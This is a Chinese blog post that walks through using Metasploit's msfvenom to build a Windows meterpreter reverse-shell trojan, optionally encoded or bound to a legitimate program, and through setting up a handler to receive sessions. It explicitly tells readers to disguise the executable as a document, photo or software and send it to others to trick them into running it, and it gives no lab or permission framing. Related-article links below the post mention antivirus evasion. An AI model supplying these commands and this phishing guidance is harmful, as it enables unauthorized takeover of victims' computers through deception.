利用msf入侵电脑

最新推荐文章于 2024-05-30 14:18:45 发布
最新推荐文章于 2024-05-30 14:18:45 发布
阅读量1.1k 收藏 11
点赞数
分类专栏: msf 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44761350/article/details/124962138
版权

1.使用msf生成小马文件:msfvenom -p windows/meterpreter/reverse_tcp LHOST=<本地IP> LPORT=<本地端口> -f exe -o hacker.exe

参数

-p payloads

-f 输出格式

-o 输入地址

-e 编码方式(msfvenom -l -encoder 可以查看能使用的编码)

-x | -k 绑定程序 (例如 –x C:\nomal.exe –k –f exe –o C:\shell.exe

2.将文件放在目标主机上,主要利用钓鱼的思想(执行命令:(linux上运行需要)chmod 777 hacker.exe (给予权限)

3.

msfconsole (运行msfconsole)

use exploit/multi/handler (选择模块)

set payload windows/meterpreter/reverse_tcp

set lhost 加ip地址
set lport 加端口号

exploit -z -j (后台执行)

 4.这样木马就配置好了,然后发给别人(可以伪造成文档,照片,软件等文件骗取别人打开)

发给别人后,在目标机器上等待别人打开hacker.exe,打开即上钩了

5.sessions(查看用户)

sessions -i 1 (选择用户1)

进入目标电脑,获得权限

世界我喜欢你
关注
  • 0
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件
简介
04-30 2706
我昨天我测试了,没成功所以SSH爆破先不写了,我已经把永恒之蓝漏洞玩明白了,这回是采用实战的方式进行入侵。提示:以下是本篇文章正文内容,下面案例可供参考本文就是讲解远程控制并执行文件。
kail利用msf工具对ms11-003漏洞入侵渗透Win7
qq_50854662的博客
05-26 2009
前言: windows7IE溢出攻击 实验环境: 工具:metasploit 靶机两台:windows 7和kali2020 攻击机IP地址:10.20.29.129 被攻击机IP地址:10.20.29.134 步骤: 1、在kali里面打开metasploit漏洞利用框架 2、搜索ms11-003漏洞利用模块 3、使用利用模块use exploit/windows/browser/ms11_003_ie_css_import 4、设置payload set pay...
msf攻击windows实例
最新发布
qq_52712762的博客
05-30 1501
环境:攻击机kali(192.168.129.139),目标机windows10(192.168.129.132)方法一:通过web站点,使用无文件的方式攻击利用执行(命令执行漏洞)方法二:通过web站点,上传webshel,返回给msfmsfvenom)方法三:攻击其他端口服务,拿到meterpreter(445)
Kali | MSF入侵Windows11
BeacherHou的博客
07-13 6039
Kali | MSF入侵Windows11 制作免杀木马 ### 木马如何免杀 木马绕过免杀本质上还是更改他的特征码,那么总结一下可以有 编码 加壳免杀 二次编译 分离免杀:即将ShellCode和加载器分离 目前msfvenom的encoder特征基本都进入了杀软的漏洞库,很难实现单一encoder编码而绕过杀软,所以对shellcode进行进一步修改编译成了msf免杀的主流。互联网上有很多借助于C、C#、python等语言对shellcode进行二次编码从而达到免杀的效果。 木马如何制作 安装编译
记一次MSF永恒之蓝入侵win7系统实验
weixin_62297109的博客
12-31 2809
MSF是渗透安全人员非常重要的,必须了解的一个软件,这次实验记录一些msf最基础最简单的用法和命令,希望对大家入门有所帮助
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
msf windows
09-22
msf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windows
Metasploit简单利用入侵Windows7案例.docx
11-13
Metasploit 入门---漏洞利用实验,攻击机系统:kali linux虚拟机。本文选择MS17_010漏洞(永恒之蓝)和MS08-067漏洞利用来尝试入侵Windows7虚拟机系统,目标机系统:Windows7 x64虚拟机。
kali 渗透msf
11-14
kali渗透测试利器
利用kali对Windows进行msf渗透(详细介绍)
2302_78587828的博客
09-17 1861
msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。msfvenom支持多种操作系统和架构,包括Windows、Linux、macOS以及各种CPU架构。它可以生成各种类型的恶意软件,如反向连接和绑定Shell、Meterpreter反弹Shell、恶意文档、木马等。
使用MSFPC远程控制
y3174445239的博客
06-24 563
切换为root用户之后,可以对安卓机进行最大权限的控制,比如关闭selinux、读取文件等。按目标系统分:Windows、Androd、iOS、各种版本的Linux操作系统。Netcat工具的使用:(以Metasploitable 2的80端口为例进行测试)2、输入shell,执行各种命令,如查看操作系统信息、切换到root用户等。按连接方式分:正向、反向(注意:现在大都采用反向远程控制方式)5、打开cmd执行各种命令,如查看文件夹内容、操作系统信息、关机。(2)在安卓虚拟机中弹出提示信息,选择“允许”。
MSF模拟渗透测试攻击window实例
lza20001103的博客
04-06 4142
一次MSF模拟渗透测试攻击window实例
使用msf渗透Win7主机并远程执行命令
qq_44821149的博客
01-23 3391
本文仅用于学习和研究,切勿用于非法用途,本文不承担任何法律责任 1.1 通过 msf 模块获取 Win7 主机远程 shell 1.1.1 我们先进入msf msf5 > msfdb run 1.1.2我们再扫描目标是否存在 ms17-010 漏洞 msf5 > search ms17-01 1.1.3 我们使用 use 命令选中这个模块 msf5 > use auxiliary/scanner/smb/smb_ms17_010 然后我们查看模块需要配置的信息 msf5 auxili
MSF远程渗透windows主机
Cwillchris的博客
05-04 716
刚接触MSF的你本地已经学会了渗透,但是如何远程渗透,怎么做,今天教你,声明仅限教学 1、环境准备 准备好 kali linux (IP为192.168.98.30) Windows靶机(IP为192.168.98.150,可以是任意没有安装杀软的Windows机器,有兴趣的可以让不在一个局域网的朋友配合一下) 2、申请免费公网隧道 打开Sunny网 ,注册个账号 按要求注册一个账号,然后登录 然后先仔细看教程,先进行实名认证,需要pay认证费用,且通过支付宝实名认证(防..
MSF详解及常用命令之利用msf控制目标电脑
世间繁华梦一出
12-21 2571
MSF基本操作详解序言:MSF简介1、模块介绍2、基本命令3、后渗透4、msfvenom生成后门木马 ** 序言:MSF简介 Metasploit简称msf,Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 ** 1、模块介绍 它是一个渗透测试框架(模块介绍) auxi
msf windows主机攻防
weixin_46476861的博客
01-23 848
meterpreter命令 incognito 伪装 impersonate模仿 模拟任意用户(token操作),无密码就行 账号密码获取工具 远程3389(CVE-2019-0708)渗透攻击 远程3389另外一个(MS12-020)渗透攻击 提示:系统漏洞一般不做验证,扫到了写个报告就行,验证了蓝屏风险大。 CVE-2015-1635 HTTP.SYS远程执行代码漏洞(ms15-034) 内容:利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的ht
远程个人电脑
别人笑我太疯癫,我笑他人看不穿。
09-03 226
此时你就可以做你想做的事情了,注意操作时使用kali的命令即可,且一般触发后,主控端所处在被控程序被触发的目录中。第一步:你需要用Kali做一个被控端,也就是用用来控制目标电脑的木马程序,正常情况下做出来后是要伪装的。第三步:目标电脑触发被控程序,就是等目标运行了被控程序后,你在主控端会收到一条日志,并出现控制会话。-o:生成被控端名为payload.exe,保存在kali的/root目录下。被控端木马生成后,怎么放到目标电脑上是你的事,本篇准备了一个Win10虚拟机。执行命令,开始监听被控程序。
怎么利用msf入侵电脑
02-21
我不太清楚具体的步骤,但是我可以提供一些概念性的指导:首先,你需要获取一个可用的Metasploit框架,然后使用它来扫描目标系统,检查是否有可利用的漏洞。如果有,你可以尝试利用这些漏洞来入侵目标系统。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值